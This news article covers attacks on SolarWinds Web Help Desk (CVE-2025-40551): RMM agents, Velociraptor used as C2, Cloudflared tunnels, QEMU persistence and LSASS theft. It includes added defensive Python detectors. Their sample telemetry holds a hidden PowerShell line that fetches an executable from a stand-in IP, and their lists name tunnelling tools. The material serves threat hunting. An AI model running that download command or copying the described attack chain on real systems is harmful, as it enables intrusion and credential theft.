Ptechhub
Researchers delve inside new SolarWinds RCE attack chain | Computer Weekly

By Computer Weekly
February 10, 2026


Researchers at Huntress have published new data on exploitation of a critical SolarWinds Web Help Desk (WHD) vulnerability, revealing how, in at least three known incidents, attackers conducted extensive post-exploitation activity with a common set of tools, including legitimate services such as Zoho ManageEngine and Elastic.

Tracked as CVE-2025-40551, the data deserialisation vulnerability was first flagged by SolarWinds on 28 January and last week was added to the US Cybersecurity and Infrastructure Security Agency's (Cisa) Known Exploited Vulnerabilities (Kev) catalogue, which requires US federal civilian agencies to remediate it by a set deadline.

“Threat actors are actively weaponising WHD vulnerabilities to achieve remote code execution [RCE] and deploy additional tooling in victim environments,” said the Huntress team.

The research team at Huntress – which protects multiple SolarWinds customers through its channel – found that, having broken into their victim environments, the attackers used WHD's service wrapper, the process that launches the underlying Java application, to spawn child processes and install a payload. That payload was in fact a Zoho ManageEngine remote monitoring and management (RMM) agent.

This done, the threat actor used the RMM agent to execute several Active Directory discovery commands to enumerate the environment. Shortly after this, they opened a Zoho Assist remote session which they used to install the open source digital forensics and incident response (DFIR) tool Velociraptor.

“While Velociraptor is designed to help defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via VQL queries, make it equally effective as a C2 [Command and Control] framework when pointed at attacker-controlled infrastructure,” said Huntress.

In the instances its team investigated, the attackers were actually using a rather outdated version of Velociraptor that itself contained a privilege escalation flaw disclosed in 2025. Moreover, the Velociraptor server infrastructure pointed back to a known Cloudflare account associated with the Warlock ransomware operation, a possible hint to the provenance of the campaign.

Alongside Velociraptor, the threat actor also downloaded Cloudflared, the command line client for Cloudflare Tunnel, likely in order to establish a second, redundant means of access.

They then executed a PowerShell script to collect system information – operating system version, hardware specification, domain membership, installed hotfixes – which was exfiltrated to a legitimate Elastic Cloud instance running as a free trial on Elastic's software-as-a-service (SaaS) infrastructure.
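The chain described across the preceding paragraphs (WHD service wrapper and its Java process spawning a shell, which fetches an RMM agent, which in turn drops Cloudflared) is a process-tree pattern that can be hunted for in endpoint telemetry. The following is an added example, not Huntress, Microsoft or SolarWinds code: it walks constructed Sysmon-style process-creation events and reports every suspect process whose parent chain reaches WHD. The WHD image names, the `webhelpdesk` path hint, the PIDs, paths and command lines are all assumptions made for illustration and should be tuned to what your own WHD host runs.

```python
"""Flag post-exploitation process chains rooted at the SolarWinds Web Help Desk
(WHD) service wrapper, using process-creation telemetry (Sysmon Event ID 1 or
Security 4688 style).

Added example: this is not Huntress, Microsoft or SolarWinds code. The WHD
image names, the install-path hint and the sample events below are
assumptions constructed for illustration; tune them to what your WHD host
actually runs before relying on the output.
"""
from dataclasses import dataclass

# Assumed WHD process images: the service wrapper and the Java it launches.
WHD_IMAGES = {"whd.exe", "wrapper.exe", "java.exe"}
WHD_PATH_HINT = "webhelpdesk"   # substring expected in the WHD image path (assumption)

# Children a help-desk web application has no business spawning, drawn from
# the tooling the article describes (shells, RMM agents, cloudflared,
# Velociraptor, QEMU).
SUSPECT_IMAGES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe",
    "cloudflared.exe", "velociraptor.exe", "qemu-system-x86_64.exe",
}
SUSPECT_HINTS = ("manageengine", "zohoassist", "velociraptor", "cloudflared", "qemu")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str
    user: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_whd(ev: ProcEvent) -> bool:
    return _basename(ev.image) in WHD_IMAGES and WHD_PATH_HINT in ev.image.lower()


def is_suspect(ev: ProcEvent) -> bool:
    haystack = (ev.image + " " + ev.cmdline).lower()
    return _basename(ev.image) in SUSPECT_IMAGES or any(h in haystack for h in SUSPECT_HINTS)


def find_whd_spawn_chains(events):
    """Return one tuple of PIDs per suspect process whose ancestry reaches a
    WHD process, ordered root (WHD) -> leaf (suspect). Suspect processes that
    are not under WHD (e.g. an admin's own PowerShell) are ignored."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if not is_suspect(ev):
            continue
        chain, cur, seen = [ev], ev, {ev.pid}
        while cur.ppid in by_pid and cur.ppid not in seen:   # seen guards PID-reuse loops
            cur = by_pid[cur.ppid]
            seen.add(cur.pid)
            chain.append(cur)
            if is_whd(cur):
                findings.append(tuple(c.pid for c in reversed(chain)))
                break
    return findings


def describe(chain, events) -> str:
    by_pid = {e.pid: e for e in events}
    return " -> ".join(f"{_basename(by_pid[p].image)}({p})" for p in chain)


# Constructed sample telemetry (not real logs); PIDs, paths and hosts are invented.
SYSTEM = r"NT AUTHORITY\SYSTEM"
SAMPLE_EVENTS = [
    ProcEvent(1200, 800,  r"C:\Program Files\WebHelpDesk\bin\wrapper.exe", "wrapper.exe -s whd.conf", SYSTEM),
    ProcEvent(1300, 1200, r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe", "java.exe -Xmx2g -jar whd.jar", SYSTEM),
    ProcEvent(2100, 1300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -nop -w hidden", SYSTEM),
    ProcEvent(2150, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -nop -w hidden -c iwr http://203.0.113.10/a.exe -o C:\Users\Public\ManageEngine_Agent.exe", SYSTEM),
    ProcEvent(2200, 2150, r"C:\Users\Public\ManageEngine_Agent.exe", "ManageEngine_Agent.exe /silent", SYSTEM),
    ProcEvent(2300, 2200, r"C:\ProgramData\cloudflared.exe", "cloudflared tunnel run", SYSTEM),
    # Benign: an admin backup script under svchost, not under WHD, must not be flagged.
    ProcEvent(3000, 800,  r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs", SYSTEM),
    ProcEvent(3100, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1", SYSTEM),
]

if __name__ == "__main__":
    for chain in find_whd_spawn_chains(SAMPLE_EVENTS):
        print("WHD spawned:", describe(chain, SAMPLE_EVENTS))
```

Walking up from each suspect leaf rather than down from WHD means a chain is reported even when an intermediate parent (the downloaded agent, for instance) is not itself on any blocklist; the `seen` set stops the walk if PID reuse has produced a cycle in the telemetry.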

The researchers said it was somewhat ironic that the threat actor had essentially built themselves a security information and event management (SIEM) solution on Elastic’s infrastructure to triage their victims.

“Elastic’s own tooling, typically used by defenders for threat hunting and incident response, was repurposed as an attacker’s victim management dashboard,” they said.

“We have reported this malicious instance to Elastic as well as law enforcement and performed victim notification and outreach to non-Huntress partners,” said the Huntress team.

Microsoft reports on further attacks

Huntress' full write-up of its research details various other actions taken by the threat actor during the course of their intrusions. Meanwhile, Microsoft has published details of a similar multi-stage intrusion orchestrated via SolarWinds WHD, although it has not yet been able to establish whether the attackers exploited CVE-2025-40551 or CVE-2025-26399 – another RCE bug, disclosed in September 2025, that bypassed the fix for a previous flaw, which in turn had bypassed the fix for a third issue first flagged in 2024.

The incident investigated by Microsoft saw the attackers use the compromised WHD instance to spawn PowerShell in order to download and execute a Zoho ManageEngine RMM agent and gain control of the system, after which they conducted reconnaissance while setting up reverse secure shell (SSH) and remote desktop protocol (RDP) access to maintain their bridgehead.

Microsoft also observed the attackers creating a scheduled task to launch a QEMU virtual machine under the SYSTEM account on startup, which let them run their tooling inside a guest where host-based security controls have little visibility. Huntress had also noted this in some instances.
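The QEMU persistence pattern above (a scheduled task, SYSTEM principal, boot trigger, hypervisor binary dropped outside the usual program directories) is visible in a task's exported XML. The following is an added example, not Microsoft's or Huntress' code: it parses Task Scheduler XML and flags a task only when a hypervisor binary is launched by a SYSTEM task at boot or logon, so that a developer's own VM task is merely noted. The two task definitions are constructed samples, and the non-QEMU names in `VM_HINTS` are an assumption extending the page's QEMU case.

```python
"""Triage exported Task Scheduler XML for the persistence pattern Microsoft
describes: a task that starts a QEMU virtual machine as SYSTEM at boot.

Added example, not Microsoft's or Huntress' code. The two task definitions
below are constructed samples; the non-QEMU hypervisor names in VM_HINTS are
an assumption extending the page's QEMU case. Real tasks can be exported with
`schtasks /query /xml` or read from the Tasks folder under System32; those
files are UTF-16, so pass the raw bytes to parse_task rather than a decoded str.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", r"nt authority\system"}
VM_HINTS = ("qemu", "vboxheadless", "vmrun")     # qemu from the page; the rest assumed
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class TaskInfo:
    user: str
    run_level: str
    triggers: list
    actions: list           # (command, arguments) pairs


@dataclass
class Verdict:
    flagged: bool
    reasons: list = field(default_factory=list)


def parse_task(xml_data) -> TaskInfo:
    """Extract principal, trigger types and Exec actions from task XML (str or bytes)."""
    root = ET.fromstring(xml_data)
    trig = root.find("t:Triggers", NS)
    triggers = [c.tag.rsplit("}", 1)[-1] for c in trig] if trig is not None else []
    principal = root.find("t:Principals/t:Principal", NS)
    user = run_level = ""
    if principal is not None:
        user = (principal.findtext("t:UserId", default="", namespaces=NS)
                or principal.findtext("t:GroupId", default="", namespaces=NS))
        run_level = principal.findtext("t:RunLevel", default="", namespaces=NS)
    actions = [(e.findtext("t:Command", default="", namespaces=NS),
                e.findtext("t:Arguments", default="", namespaces=NS))
               for e in root.findall("t:Actions/t:Exec", NS)]
    return TaskInfo(user, run_level, triggers, actions)


def assess(task: TaskInfo) -> Verdict:
    reasons = []
    if task.user.lower() in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    if "BootTrigger" in task.triggers or "LogonTrigger" in task.triggers:
        reasons.append("starts at boot/logon")
    launches_vm = False
    for command, args in task.actions:
        target = (command + " " + args).lower()
        if any(h in target for h in VM_HINTS):
            launches_vm = True
            reasons.append("launches hypervisor binary")
        if command and not command.lower().startswith(TRUSTED_DIRS):
            reasons.append("binary outside Windows/Program Files")
    # A VM launched by a boot-time SYSTEM task is the pattern in the article;
    # a hypervisor alone (a developer's VM task) is only noted, not flagged.
    flagged = launches_vm and "runs as SYSTEM" in reasons and "starts at boot/logon" in reasons
    return Verdict(flagged, reasons)


# Constructed samples (no XML declaration so they parse as str; real exports are UTF-16).
QEMU_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\\ProgramData\\qemu\\qemu-system-x86_64.exe</Command>
    <Arguments>-m 2048 -hda C:\\ProgramData\\qemu\\vm.qcow2 -nographic</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2026-01-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files\\Windows Defender\\MpCmdRun.exe</Command>
    <Arguments>-Scan -ScanType 1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("qemu-task", QEMU_TASK_XML), ("defender-scan", BENIGN_TASK_XML)):
        verdict = assess(parse_task(xml))
        print(name, "FLAGGED" if verdict.flagged else "ok", verdict.reasons)
```

Running this over every task on a suspected host gives a short list to review; the "binary outside Windows/Program Files" reason on its own is noisy (plenty of legitimate software schedules itself from ProgramData), which is why the verdict hinges on the combination rather than any single reason.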

On some hosts, Microsoft said the attackers also used dynamic link library (DLL) sideloading to gain access to Local Security Authority Subsystem Service (LSASS) memory in order to steal more credentials.

Besides patching and isolating compromised hosts, Microsoft is advising its customers to evict any RMM artifacts, particularly those associated with ManageEngine, that may have been added after exploitation, and to immediately rotate credentials for all service and admin accounts accessible from WHD.

Copyright © 2025 | Powered By Porpholio